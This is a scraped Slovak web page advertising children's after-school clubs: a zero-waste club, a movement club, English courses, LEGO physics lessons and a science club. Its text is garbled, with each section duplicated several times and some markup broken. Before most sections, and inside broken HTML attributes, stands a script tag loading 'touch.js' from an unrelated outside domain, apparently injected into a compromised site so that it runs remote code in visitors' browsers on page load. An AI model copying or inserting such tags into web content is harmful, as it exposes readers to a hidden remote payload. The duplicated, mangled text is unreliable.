/ Meniny má Mikuláš
<script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script><h2>Krúžok Ekošerifa</h2>
naučí naše ratolesti čo znamená zero waste, teda znižovanie odpadu. Budeme sa hrať, zabávať a objavovať princíp fungovania prírody. Prečo vzniká odpad a ako nás ovplyvňuje?  Ako zabrániť jeho vytváraniu a správať sa zodpovedne? Prečo by sme sa mali starať o prírodu, chrániť zvieratká a vysádzať stromy? To všetko a ešte oveľa viac nám ukáže formou hry a zábavy náš nový krúžok.
<h2><strong>Ako to dosiahneme?</strong></h2>
Ekošerif má komplexný plán ako deti naučí edukačnými hrami všetky základné pravidlá o zero waste. <strong>Budeme experimentovať, tvoriť, separovať a zabávať sa!</strong> Máme pripravené tipy a triky ako vytvárať čo najmenej odpadu a nahliadneme aj do nášho domáceho kompostéra s dážďovkami, a naučíme deti odpad nevytvárať.

Naše deti nepotrebujú každý deň novú hračku, nemusia púšťať vodu počas celého umývania zúbkov, nemusia mať desiatu v plastových sáčkoch a nemusia veľa ďalších vecí. Odpad sa snažíme nevytvárať. Ak už nejaký odpad vznikne, napríklad z plastových a sklenených nádob od jogurtu, vieme si z neho vytvoriť črepníky pre rastlinky, sklenené svietniky, čelenky pre indiánov a mnoho ďalších vecí, ktoré vám u nás ukážeme.

<strong>Spoločne sa pustíme do záchrany planéty, budeme experimentovať, znižovať odpad tvorivými hrami a dokonca aj kompostovať. Každé dieťa sa môže stať  Ekošerifom a malými krôčikmi dosiahnuť veľké veci.</strong> <script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script><h2>Krúžok Ekošerifa</h2>
naučí naše ratolesti čo znamená zero waste, teda znižovanie odpadu. Budeme sa hrať, zabávať a objavovať princíp fungovania prírody. Prečo vzniká odpad a ako nás ovplyvňuje?  Ako zabrániť jeho vytváraniu a správať sa zodpovedne? Prečo by sme sa mali starať o prírodu, chrániť zvieratká a vysádzať stromy? To všetko a ešte oveľa viac nám ukáže formou hry a zábavy náš nový krúžok.
<h2><strong>Ako to dosiahneme?</strong></h2>
Ekošerif má komplexný plán ako deti naučí edukačnými hrami všetky základné pravidlá o zero waste. <strong>Budeme experimentovať, tvoriť, separovať a zabávať sa!</strong> Máme pripravené tipy a triky ako vytvárať čo najmenej odpadu a nahliadneme aj do nášho domáceho kompostéra s dážďovkami, a naučíme deti odpad nevytvárať.

Naše deti nepotrebujú každý deň novú hračku, nemusia púšťať vodu počas celého umývania zúbkov, nemusia mať desiatu v plastových sáčkoch a nemusia veľa ďalších vecí. Odpad sa snažíme nevytvárať. Ak už nejaký odpad vznikne, napríklad z plastových a sklenených nádob od jogurtu, vieme si z neho vytvoriť črepníky pre rastlinky, sklenené svietniky, čelenky pre indiánov a mnoho ďalších vecí, ktoré vám u nás ukážeme.

<strong>Spoločne sa pustíme do záchrany planéty, budeme experimentovať, znižovať odpad tvorivými hrami a dokonca aj kompostovať. Každé dieťa sa môže stať  Ekošerifom a malými krôčikmi dosiahnuť veľké veci.</strong>

Krúžok Ekošerifa

naučí naše ratolesti čo znamená zero waste, teda znižovanie odpadu. Budeme sa hrať, zabávať a objavovať princíp fungovania prírody. Prečo vzniká odpad a ako nás ovplyvňuje?  Ako zabrániť jeho vytváraniu a správať sa zodpovedne? Prečo by sme sa mali starať o prírodu, chrániť zvieratká a vysádzať stromy? To všetko a ešte oveľa viac nám ukáže formou hry a zábavy náš nový krúžok.

Ako to dosiahneme?

Ekošerif má komplexný plán ako deti naučí edukačnými hrami všetky základné pravidlá o zero waste. Budeme experimentovať, tvoriť, separovať a zabávať sa! Máme pripravené tipy a triky ako vytvárať čo najmenej odpadu a nahliadneme aj do nášho domáceho kompostéra s dážďovkami, a naučíme deti odpad nevytvárať. Naše deti nepotrebujú každý deň novú hračku, nemusia púšťať vodu počas celého umývania zúbkov, nemusia mať desiatu v plastových sáčkoch a nemusia veľa ďalších vecí. Odpad sa snažíme nevytvárať. Ak už nejaký odpad vznikne, napríklad z plastových a sklenených nádob od jogurtu, vieme si z neho vytvoriť črepníky pre rastlinky, sklenené svietniky, čelenky pre indiánov a mnoho ďalších vecí, ktoré vám u nás ukážeme. Spoločne sa pustíme do záchrany planéty, budeme experimentovať, znižovať odpad tvorivými hrami a dokonca aj kompostovať. Každé dieťa sa môže stať  Ekošerifom a malými krôčikmi dosiahnuť veľké veci.

Krúžok Ekošerifa naučí naše ratolesti čo znamená zero waste, teda znižovanie odpadu. Budeme sa hrať, zabávať a objavovať princíp fungovania prírody. Prečo vzniká odpad a ako nás ovplyvňuje?  Ako zabrániť jeho vytváraniu a správať sa zodpovedne? Prečo by sme sa mali starať o prírodu, chrániť zvieratká a vysádzať stromy? To všetko a ešte oveľa viac nám ukáže formou hry […]

<script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script>V dnešnej dobe, kedy ide postupne pohyb detí do úzadia,je veľmi dôležité, aby sa deti nezabúdali hýbať. Treba už od najmladšieho školského veku u nich apelovať na dôležitosť pohybu. Nejde pri tom len o podstatný zdravotný aspekt, ktorý je významný pre harmonický vývoj detí, ale taktiež o spôsob ako predísť negatívnym socializačným javom. Budeme rozvíjať všeobecné pohybové schopnosti detí pomocou zábavných súťaží v pohybe, učiť ich spolupracovať a navzájom sa povzbudzovať v tímoch, učiť ich základom disciplíny a povzbudzovať ich súťaživosť. Dôrazom je, aby všetky prostriedky využívané v pohybovej príprave zohľadňovali prirodzenú hravosť a aktivitu detí a podnietili ich záujem o pohybové aktivity – športovanie. Aby deti samé od seba prejavovali v budúcnosti záujem o šport, aby sa chceli hýbať, aby si našli pomocou športu aj nových kamarátov a aby sa z nich stali ľudia, ktorí budú schopní rešpektovať pravidlá a riadiť sa nimi v duchu fair play.

<strong><u>PREČO PRÁVE NÁŠ POHYBOVÝ KRÚŽOK?
</u></strong>-hlavným cieľom vyučovacích hodín nebude učiť deti konkrétnym športom, ich pravidlám alebo ich učiť presne technicky správne prevedenie kotúľa a to dookola opakovať ale naučiť ich HÝBAŤ SA hravou formou.
– deti sa budú hýbať formou zábavných hier, súťaží a tým budú získavať základné všeobecné pohybové návyky
– budú sa učiť spolupracovať a navzájom sa povzbudzovať v tímoch
– budú sa učiť základom disciplíny a zároveň budeme povzbudzovať ich skrytú súťaživosť
– vďaka spolupráci v tímoch sa deti naučia ľahšie začleniť do kolektívu
–
<strong><u>PREČO DETI PRIHLÁSIŤ NA POHYBOVÝ KRÚŽOK?</u></strong><strong><u>
</u></strong>– stále sa častejšie objavujúca detská obezita je reálny problém
– problémy detí s plochými nohami
– neustály rozvoj technológii a s tým súvisiaci upadajúci záujem o pohyb
– ťažšie hľadanie kamarátov a začlenenie sa do kolektívu kvôli sociálnym sieťam <script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script>V dnešnej dobe, kedy ide postupne pohyb detí do úzadia,je veľmi dôležité, aby sa deti nezabúdali hýbať. Treba už od najmladšieho školského veku u nich apelovať na dôležitosť pohybu. Nejde pri tom len o podstatný zdravotný aspekt, ktorý je významný pre harmonický vývoj detí, ale taktiež o spôsob ako predísť negatívnym socializačným javom. Budeme rozvíjať všeobecné pohybové schopnosti detí pomocou zábavných súťaží v pohybe, učiť ich spolupracovať a navzájom sa povzbudzovať v tímoch, učiť ich základom disciplíny a povzbudzovať ich súťaživosť. Dôrazom je, aby všetky prostriedky využívané v pohybovej príprave zohľadňovali prirodzenú hravosť a aktivitu detí a podnietili ich záujem o pohybové aktivity – športovanie. Aby deti samé od seba prejavovali v budúcnosti záujem o šport, aby sa chceli hýbať, aby si našli pomocou športu aj nových kamarátov a aby sa z nich stali ľudia, ktorí budú schopní rešpektovať pravidlá a riadiť sa nimi v duchu fair play.

<strong><u>PREČO PRÁVE NÁŠ POHYBOVÝ KRÚŽOK?
</u></strong>-hlavným cieľom vyučovacích hodín nebude učiť deti konkrétnym športom, ich pravidlám alebo ich učiť presne technicky správne prevedenie kotúľa a to dookola opakovať ale naučiť ich HÝBAŤ SA hravou formou.
– deti sa budú hýbať formou zábavných hier, súťaží a tým budú získavať základné všeobecné pohybové návyky
– budú sa učiť spolupracovať a navzájom sa povzbudzovať v tímoch
– budú sa učiť základom disciplíny a zároveň budeme povzbudzovať ich skrytú súťaživosť
– vďaka spolupráci v tímoch sa deti naučia ľahšie začleniť do kolektívu
–
<strong><u>PREČO DETI PRIHLÁSIŤ NA POHYBOVÝ KRÚŽOK?</u></strong><strong><u>
</u></strong>– stále sa častejšie objavujúca detská obezita je reálny problém
– problémy detí s plochými nohami
– neustály rozvoj technológii a s tým súvisiaci upadajúci záujem o pohyb
– ťažšie hľadanie kamarátov a začlenenie sa do kolektívu kvôli sociálnym sieťam

V dnešnej dobe, kedy ide postupne pohyb detí do úzadia,je veľmi dôležité, aby sa deti nezabúdali hýbať. Treba už od najmladšieho školského veku u nich apelovať na dôležitosť pohybu. Nejde pri tom len o podstatný zdravotný aspekt, ktorý je významný pre harmonický vývoj detí, ale taktiež o spôsob ako predísť negatívnym socializačným javom. Budeme rozvíjať všeobecné pohybové schopnosti detí pomocou zábavných súťaží v pohybe, učiť ich spolupracovať a navzájom sa povzbudzovať v tímoch, učiť ich základom disciplíny a povzbudzovať ich súťaživosť. Dôrazom je, aby všetky prostriedky využívané v pohybovej príprave zohľadňovali prirodzenú hravosť a aktivitu detí a podnietili ich záujem o pohybové aktivity – športovanie. Aby deti samé od seba prejavovali v budúcnosti záujem o šport, aby sa chceli hýbať, aby si našli pomocou športu aj nových kamarátov a aby sa z nich stali ľudia, ktorí budú schopní rešpektovať pravidlá a riadiť sa nimi v duchu fair play. PREČO PRÁVE NÁŠ POHYBOVÝ KRÚŽOK? -hlavným cieľom vyučovacích hodín nebude učiť deti konkrétnym športom, ich pravidlám alebo ich učiť presne technicky správne prevedenie kotúľa a to dookola opakovať ale naučiť ich HÝBAŤ SA hravou formou. – deti sa budú hýbať formou zábavných hier, súťaží a tým budú získavať základné všeobecné pohybové návyky – budú sa učiť spolupracovať a navzájom sa povzbudzovať v tímoch – budú sa učiť základom disciplíny a zároveň budeme povzbudzovať ich skrytú súťaživosť – vďaka spolupráci v tímoch sa deti naučia ľahšie začleniť do kolektívu – PREČO DETI PRIHLÁSIŤ NA POHYBOVÝ KRÚŽOK? – stále sa častejšie objavujúca detská obezita je reálny problém – problémy detí s plochými nohami – neustály rozvoj technológii a s tým súvisiaci upadajúci záujem o pohyb – ťažšie hľadanie kamarátov a začlenenie sa do kolektívu kvôli sociálnym sieťam

V dnešnej dobe, kedy ide postupne pohyb detí do úzadia,je veľmi dôležité, aby sa deti nezabúdali hýbať. Treba už od najmladšieho školského veku u nich apelovať na dôležitosť pohybu. Nejde pri tom len o podstatný zdravotný aspekt, ktorý je významný pre harmonický vývoj detí, ale taktiež o spôsob ako predísť negatívnym socializačným javom. Budeme rozvíjať všeobecné pohybové schopnosti […]

<script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script>Cieľom je rozvíjať komunikačné schopnosti dieťaťa tak, aby bez problémov dokázalo reagovať na cudzinca a “prepínať” medzi rodným jazykom a angličtinou.

Kurzy angličtiny pre školákov sú výnimočné. Vďaka metóde Wattsenglish a špecializovaným
zahraničným a slovenským lektorom učíme deti prirodzene reagovať na angličtinu a odbúravať
bariéru komunikovať v cudzom jazyku. Navyše, obsah našich lekcií nadväzuje na učivo preberané
na hodinách v školách, deti teda napredujú rýchlejšie!

Charakteristika kurzu:
výučbu vedie skúsený lektor,
vytvárame prirodzené bilingválne prostredie,
používame metodické postupy Wattsenglish®,
súčasťou výučby sú špecializované učebné materiály Wattsenglish – kniha, CD a DVD.

Ako vyzerá výučba?
Lektor na hodinách používa metodické postupy Wattsenglish a systematicky
strieda rôzne aktivity,
pri vysvetľovaní používa príklady a názorné ukážky,
využíva princíp reči tela a telesné aktivity (skákanie, behanie, tancovanie), aby
deti pochopili zadanie,
súčasťou sú aj kolektívne hry, ktoré vtiahnu do deja celú skupinu,
hodiny sú zaujímavé a majú spád, deti udržia 100% sústredenosť a napredujú rýchlejšie.

Ako vyzerajú učebné materiály?
Materiály tvoria integrovanú súčasť konceptu Wattsenglish®,
sú určené presne pre danú detskú kategóriu,
hlavným motívom je tvár zakladateľa metódy – Steva Wattsa,
sú zostavené zahraničnými metodikmi a pedagógmi a overené dlhoročnou praxou,
súčasťou je CD s pesničkami a DVD s videonahrávkami,
dieťa je vďaka nim neustále v kontakte s jazykom a učí sa rýchlejšie a prirodzenejšie. <script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script>Cieľom je rozvíjať komunikačné schopnosti dieťaťa tak, aby bez problémov dokázalo reagovať na cudzinca a “prepínať” medzi rodným jazykom a angličtinou.

Kurzy angličtiny pre školákov sú výnimočné. Vďaka metóde Wattsenglish a špecializovaným
zahraničným a slovenským lektorom učíme deti prirodzene reagovať na angličtinu a odbúravať
bariéru komunikovať v cudzom jazyku. Navyše, obsah našich lekcií nadväzuje na učivo preberané
na hodinách v školách, deti teda napredujú rýchlejšie!

Charakteristika kurzu:
výučbu vedie skúsený lektor,
vytvárame prirodzené bilingválne prostredie,
používame metodické postupy Wattsenglish®,
súčasťou výučby sú špecializované učebné materiály Wattsenglish – kniha, CD a DVD.

Ako vyzerá výučba?
Lektor na hodinách používa metodické postupy Wattsenglish a systematicky
strieda rôzne aktivity,
pri vysvetľovaní používa príklady a názorné ukážky,
využíva princíp reči tela a telesné aktivity (skákanie, behanie, tancovanie), aby
deti pochopili zadanie,
súčasťou sú aj kolektívne hry, ktoré vtiahnu do deja celú skupinu,
hodiny sú zaujímavé a majú spád, deti udržia 100% sústredenosť a napredujú rýchlejšie.

Ako vyzerajú učebné materiály?
Materiály tvoria integrovanú súčasť konceptu Wattsenglish®,
sú určené presne pre danú detskú kategóriu,
hlavným motívom je tvár zakladateľa metódy – Steva Wattsa,
sú zostavené zahraničnými metodikmi a pedagógmi a overené dlhoročnou praxou,
súčasťou je CD s pesničkami a DVD s videonahrávkami,
dieťa je vďaka nim neustále v kontakte s jazykom a učí sa rýchlejšie a prirodzenejšie.

Cieľom je rozvíjať komunikačné schopnosti dieťaťa tak, aby bez problémov dokázalo reagovať na cudzinca a “prepínať” medzi rodným jazykom a angličtinou. Kurzy angličtiny pre školákov sú výnimočné. Vďaka metóde Wattsenglish a špecializovaným zahraničným a slovenským lektorom učíme deti prirodzene reagovať na angličtinu a odbúravať bariéru komunikovať v cudzom jazyku. Navyše, obsah našich lekcií nadväzuje na učivo preberané na hodinách v školách, deti teda napredujú rýchlejšie! Charakteristika kurzu: výučbu vedie skúsený lektor, vytvárame prirodzené bilingválne prostredie, používame metodické postupy Wattsenglish®, súčasťou výučby sú špecializované učebné materiály Wattsenglish – kniha, CD a DVD. Ako vyzerá výučba? Lektor na hodinách používa metodické postupy Wattsenglish a systematicky strieda rôzne aktivity, pri vysvetľovaní používa príklady a názorné ukážky, využíva princíp reči tela a telesné aktivity (skákanie, behanie, tancovanie), aby deti pochopili zadanie, súčasťou sú aj kolektívne hry, ktoré vtiahnu do deja celú skupinu, hodiny sú zaujímavé a majú spád, deti udržia 100% sústredenosť a napredujú rýchlejšie. Ako vyzerajú učebné materiály? Materiály tvoria integrovanú súčasť konceptu Wattsenglish®, sú určené presne pre danú detskú kategóriu, hlavným motívom je tvár zakladateľa metódy – Steva Wattsa, sú zostavené zahraničnými metodikmi a pedagógmi a overené dlhoročnou praxou, súčasťou je CD s pesničkami a DVD s videonahrávkami, dieťa je vďaka nim neustále v kontakte s jazykom a učí sa rýchlejšie a prirodzenejšie.

Cieľom je rozvíjať komunikačné schopnosti dieťaťa tak, aby bez problémov dokázalo reagovať na cudzinca a “prepínať” medzi rodným jazykom a angličtinou. Kurzy angličtiny pre školákov sú výnimočné. Vďaka metóde Wattsenglish a špecializovaným zahraničným a slovenským lektorom učíme deti prirodzene reagovať na angličtinu a odbúravať bariéru komunikovať v cudzom jazyku. Navyše, obsah našich lekcií nadväzuje na […]

<script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script><h3 style=Fyzikálne a prírodné javy zábavne a hravo

Vzdelávanie s kockami LEGO® podľa uceleného amerického konceptu

Každý program je postavený na základnom princípe „learning by doing“ (učenie v procese). To znamená, že metodika je zostavená tak, že každá téma má vzdelávací cieľ. Ku každej téme sú zostavené presné inštrukcie a vlastné modelové plány, ktoré boli navrhnuté v spolupráci s inžiniermi a pedagógmi v USA a sú tematicky ladené tak, aby žiakov zaujali. Dieťa tak na svojej úrovni objavuje a spoznáva fyzikálne a prírodné javy, nachádza záujem a približuje sa k reálnemu životu, čím nahrádza teoretické a izolované poznatky. Vieme, že deti sa ľahšie učia hrou, a preto si u nás všetko osvojujú cez zážitok, a tým zároveň rozvíjame ich celú osobnosť. Charakteristika hodiny: Pomenujeme si jav, ktorý ideme skúmať – lektor použije prezentáciu alebo príbehy zo špeciálnych kníh. Predstavíme deťom model, ktorý budú podľa našich postupov stavať. Deti rozdelíme do dvojíc a necháme ich model postaviť – vzniká tak prirodzená zručnosť kooperácie. Lektor je neustále prítomný, aby deti motivoval, podporoval a nechal samých prísť na správne riešenie (koučingový princíp). Modely sú z rôznych zaujímavých tém (od strojov, mechaniky až po zvieratá, či lunapark). Po dostavaní deti zapoja model a vyskúšajú jeho funkčnosť (napr. helikoptéra), alebo sa o ňom ďalej diskutuje (napr. zviera) a zahrajú sa s ním. K postaveniu každého modelu používame sadu kociek Brick by Brick, ktorá je špeciálne zostavená z kociek LEGO®. Po ukončení stavania majú deti možnosť sa s modelom zahrať, porovnať si svoj výtvor so svojimi spolužiakmi a následne model rozobrať. Žiaci si na konci hodiny spolu s lektorom zopakujú vedomosti, ktoré sa naučili prostredníctvom „pracovného listu – tajnička, osemsmerovka, doplňovačka“, ktorý si následne berú aj domov. Modely sú prispôsobené každej vekovej kategórii, nie sú nebezpečné ani zložité"> <script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script><h3 style=Fyzikálne a prírodné javy zábavne a hravo

Vzdelávanie s kockami LEGO® podľa uceleného amerického konceptu

Každý program je postavený na základnom princípe „learning by doing“ (učenie v procese). To znamená, že metodika je zostavená tak, že každá téma má vzdelávací cieľ. Ku každej téme sú zostavené presné inštrukcie a vlastné modelové plány, ktoré boli navrhnuté v spolupráci s inžiniermi a pedagógmi v USA a sú tematicky ladené tak, aby žiakov zaujali. Dieťa tak na svojej úrovni objavuje a spoznáva fyzikálne a prírodné javy, nachádza záujem a približuje sa k reálnemu životu, čím nahrádza teoretické a izolované poznatky. Vieme, že deti sa ľahšie učia hrou, a preto si u nás všetko osvojujú cez zážitok, a tým zároveň rozvíjame ich celú osobnosť. Charakteristika hodiny: Pomenujeme si jav, ktorý ideme skúmať – lektor použije prezentáciu alebo príbehy zo špeciálnych kníh. Predstavíme deťom model, ktorý budú podľa našich postupov stavať. Deti rozdelíme do dvojíc a necháme ich model postaviť – vzniká tak prirodzená zručnosť kooperácie. Lektor je neustále prítomný, aby deti motivoval, podporoval a nechal samých prísť na správne riešenie (koučingový princíp). Modely sú z rôznych zaujímavých tém (od strojov, mechaniky až po zvieratá, či lunapark). Po dostavaní deti zapoja model a vyskúšajú jeho funkčnosť (napr. helikoptéra), alebo sa o ňom ďalej diskutuje (napr. zviera) a zahrajú sa s ním. K postaveniu každého modelu používame sadu kociek Brick by Brick, ktorá je špeciálne zostavená z kociek LEGO®. Po ukončení stavania majú deti možnosť sa s modelom zahrať, porovnať si svoj výtvor so svojimi spolužiakmi a následne model rozobrať. Žiaci si na konci hodiny spolu s lektorom zopakujú vedomosti, ktoré sa naučili prostredníctvom „pracovného listu – tajnička, osemsmerovka, doplňovačka“, ktorý si následne berú aj domov. Modely sú prispôsobené každej vekovej kategórii, nie sú nebezpečné ani zložité">

Fyzikálne a prírodné javy zábavne a hravo

Vzdelávanie s kockami LEGO® podľa uceleného amerického konceptu

Každý program je postavený na základnom princípe „learning by doing“ (učenie v procese). To znamená, že metodika je zostavená tak, že každá téma má vzdelávací cieľ. Ku každej téme sú zostavené presné inštrukcie a vlastné modelové plány, ktoré boli navrhnuté v spolupráci s inžiniermi a pedagógmi v USA a sú tematicky ladené tak, aby žiakov zaujali. Dieťa tak na svojej úrovni objavuje a spoznáva fyzikálne a prírodné javy, nachádza záujem a približuje sa k reálnemu životu, čím nahrádza teoretické a izolované poznatky. Vieme, že deti sa ľahšie učia hrou, a preto si u nás všetko osvojujú cez zážitok, a tým zároveň rozvíjame ich celú osobnosť. Charakteristika hodiny: Pomenujeme si jav, ktorý ideme skúmať – lektor použije prezentáciu alebo príbehy zo špeciálnych kníh. Predstavíme deťom model, ktorý budú podľa našich postupov stavať. Deti rozdelíme do dvojíc a necháme ich model postaviť – vzniká tak prirodzená zručnosť kooperácie. Lektor je neustále prítomný, aby deti motivoval, podporoval a nechal samých prísť na správne riešenie (koučingový princíp). Modely sú z rôznych zaujímavých tém (od strojov, mechaniky až po zvieratá, či lunapark). Po dostavaní deti zapoja model a vyskúšajú jeho funkčnosť (napr. helikoptéra), alebo sa o ňom ďalej diskutuje (napr. zviera) a zahrajú sa s ním. K postaveniu každého modelu používame sadu kociek Brick by Brick, ktorá je špeciálne zostavená z kociek LEGO®. Po ukončení stavania majú deti možnosť sa s modelom zahrať, porovnať si svoj výtvor so svojimi spolužiakmi a následne model rozobrať. Žiaci si na konci hodiny spolu s lektorom zopakujú vedomosti, ktoré sa naučili prostredníctvom „pracovného listu – tajnička, osemsmerovka, doplňovačka“, ktorý si následne berú aj domov. Modely sú prispôsobené každej vekovej kategórii, nie sú nebezpečné ani zložité

Fyzikálne a prírodné javy zábavne a hravo Vzdelávanie s kockami LEGO® podľa uceleného amerického konceptu Každý program je postavený na základnom princípe „learning by doing“ (učenie v procese). To znamená, že metodika je zostavená tak, že každá téma má vzdelávací cieľ. Ku každej téme sú zostavené presné inštrukcie a vlastné modelové plány, ktoré boli navrhnuté […]

<script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script><div class= Krúžok Veda nás baví je hravou a zábavnou formou zoznámia s tajom vedných odborov (fyzika, chémia, astronómia, prírodopis, inžinierstvo, strojárenstvo) a vyskúšajú si, aké to je, stať sa aspoň na chvíľu malým vedcom. Žiaci v krúžku robia experimenty, napr. si postavia sopku a pod. Experimenty sú navrhnuté pre žiakov prvého stupňa, nie sú teda nebezpečné ani zložité.

Náplň lekcií

 • Žiaci v rámci krúžku realizujú experimenty z oblasti napr. magnetizmu, vulkanizmu, mechanickej energie, skúmajú vlastnosti kvapalín, plynov , pevných látok a mnohé iné javy okolo nás.
 • Zrozumiteľnou formou je žiakom vysvetlená teória a princípy fungovania javov, ktoré si následne overia na jednoduchých experimentoch, napr. si postavia sopku, pristávací modul z balónov, jednoduchý kompas a pod.
 • To všetko s dôrazom na využitie nadobudnutých znalostí v praktickom živote.
 • Experimenty sú navrhnuté pre žiakov prvého stupňa, nie sú teda nebezpečné ani zložité. Pri experimentoch používame bežne dostupné materiály ako špajle, kancelárske sponky, balóny, slamky a pod.
 •  Forma
  • skupinová výučba (10 – 15 detí, vedecké tímy po 3-5 členov)
  • nahradenie výučby v prípade prázdnin či sviatku
  • deťom bude poskytnutý všetok potrebný materiál a pomôcky
"> <script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script><div class= Krúžok Veda nás baví je hravou a zábavnou formou zoznámia s tajom vedných odborov (fyzika, chémia, astronómia, prírodopis, inžinierstvo, strojárenstvo) a vyskúšajú si, aké to je, stať sa aspoň na chvíľu malým vedcom. Žiaci v krúžku robia experimenty, napr. si postavia sopku a pod. Experimenty sú navrhnuté pre žiakov prvého stupňa, nie sú teda nebezpečné ani zložité.

Náplň lekcií

 • Žiaci v rámci krúžku realizujú experimenty z oblasti napr. magnetizmu, vulkanizmu, mechanickej energie, skúmajú vlastnosti kvapalín, plynov , pevných látok a mnohé iné javy okolo nás.
 • Zrozumiteľnou formou je žiakom vysvetlená teória a princípy fungovania javov, ktoré si následne overia na jednoduchých experimentoch, napr. si postavia sopku, pristávací modul z balónov, jednoduchý kompas a pod.
 • To všetko s dôrazom na využitie nadobudnutých znalostí v praktickom živote.
 • Experimenty sú navrhnuté pre žiakov prvého stupňa, nie sú teda nebezpečné ani zložité. Pri experimentoch používame bežne dostupné materiály ako špajle, kancelárske sponky, balóny, slamky a pod.
 •  Forma
  • skupinová výučba (10 – 15 detí, vedecké tímy po 3-5 členov)
  • nahradenie výučby v prípade prázdnin či sviatku
  • deťom bude poskytnutý všetok potrebný materiál a pomôcky
">

Krúžok Veda nás baví je hravou a zábavnou formou zoznámia s tajom vedných odborov (fyzika, chémia, astronómia, prírodopis, inžinierstvo, strojárenstvo) a vyskúšajú si, aké to je, stať sa aspoň na chvíľu malým vedcom. Žiaci v krúžku robia experimenty, napr. si postavia sopku a pod. Experimenty sú navrhnuté pre žiakov prvého stupňa, nie sú teda nebezpečné ani zložité.

Náplň lekcií

 • Žiaci v rámci krúžku realizujú experimenty z oblasti napr. magnetizmu, vulkanizmu, mechanickej energie, skúmajú vlastnosti kvapalín, plynov , pevných látok a mnohé iné javy okolo nás.
 • Zrozumiteľnou formou je žiakom vysvetlená teória a princípy fungovania javov, ktoré si následne overia na jednoduchých experimentoch, napr. si postavia sopku, pristávací modul z balónov, jednoduchý kompas a pod.
 • To všetko s dôrazom na využitie nadobudnutých znalostí v praktickom živote.
 • Experimenty sú navrhnuté pre žiakov prvého stupňa, nie sú teda nebezpečné ani zložité. Pri experimentoch používame bežne dostupné materiály ako špajle, kancelárske sponky, balóny, slamky a pod.
 •  Forma
  • skupinová výučba (10 – 15 detí, vedecké tímy po 3-5 členov)
  • nahradenie výučby v prípade prázdnin či sviatku
  • deťom bude poskytnutý všetok potrebný materiál a pomôcky

Krúžok Veda nás baví je hravou a zábavnou formou zoznámia s tajom vedných odborov (fyzika, chémia, astronómia, prírodopis, inžinierstvo, strojárenstvo) a vyskúšajú si, aké to je, stať sa aspoň na chvíľu malým vedcom. Žiaci v krúžku robia experimenty, napr. si postavia sopku a pod. Experimenty sú navrhnuté pre žiakov prvého stupňa, nie sú teda nebezpečné ani […]